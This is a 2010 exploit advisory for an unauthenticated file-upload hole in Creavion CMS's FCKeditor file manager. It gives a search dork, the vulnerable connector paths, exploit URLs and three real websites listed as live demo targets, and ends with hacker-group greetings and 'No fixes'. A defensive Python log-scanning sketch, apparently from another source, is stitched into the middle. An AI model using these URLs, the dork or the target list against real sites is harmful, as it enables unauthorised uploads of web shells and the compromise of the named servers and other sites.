Creavion CMS Remote File Upload Vulnerability

2010-10-02 12:14:30
Submitted by: Net.Edit0r

======================================================
Creavion CMS Remote File Upload Vulnerability
======================================================

###########################

Author: Net.Edit0r

Email : [email protected] & [email protected]

Script: Creavion CMS [ Http://creavion.com ]

Dork : "powered by creavion cms"

Platform :linux/php

###########################

[ Vulnerable File ]

1. [ admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html ]

2. [ admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php ]
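A detection sketch for the two paths listed above, added here as an example and not part of the original advisory: it scans web server access logs for requests to the FCKeditor connector test page and file browser, and marks those answered with 200 (page still served). It assumes Apache/nginx "combined" log format; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Paths from the advisory's "Vulnerable File" list, relative to the CMS root.
FM_BASE = "/admin/fckeditor/editor/filemanager/browser/default/"
TEST_PAGE = FM_BASE + "connectors/test.html"
BROWSER_PAGE = FM_BASE + "browser.html"

# Assumed "combined" log format: only client, request line and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(target):
    """Return a label if the request target hits one of the advisory's paths."""
    parts = urlsplit(target)
    # Decode %-escapes and ignore case so trivial obfuscation still matches;
    # endswith() tolerates any install prefix (the advisory's "[path]").
    path = unquote(parts.path).lower()
    if path.endswith(TEST_PAGE):
        return "connector-test-page"
    if path.endswith(BROWSER_PAGE):
        connector = parse_qs(parts.query).get("Connector", [""])[0]
        return "file-browser" + (":" + connector if connector else "")
    return None

def scan(lines):
    """Return (client_ip, label, served) for every matching log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["target"])
        if label:
            # served=True (HTTP 200) means the page is reachable and should be
            # removed or access-restricted.
            findings.append((m["ip"], label, m["status"] == "200"))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [02/Oct/2010:12:20:01 +0000] "GET /cms/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Oct/2010:12:20:09 +0000] "GET /cms/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 3011 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Oct/2010:12:21:00 +0000] "GET /admin/fckeditor/editor/filemanager/browser/default/connectors/test%2Ehtml HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.9 - - [02/Oct/2010:12:22:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for ip, label, served in scan(SAMPLE):
        print(ip, label, "SERVED" if served else "not served")
```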

[ XpL ]

http://Target/[path]/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html


http://Target/[path]/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

OR

http://Target/File Name !


[ Demo]

http://www.visioevents.de/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html

http://creavion.de/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html

http://www.sembdner-gitarren.de/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html


########################################### Iranian HackerZ ##############################################
#
#
# Special Thanks To : Darkcoder ~ H-SK33PY ~ S3Ri0uS ~ b3hz4d ~ Classic ~ AmIr-MaGic
#
#
# Greetz : Ashiyane.Org ~ Datacoders.Org ~ Houseofhackers.Net #Ibh
#
##########################################################################################################

Fixes

No fixes
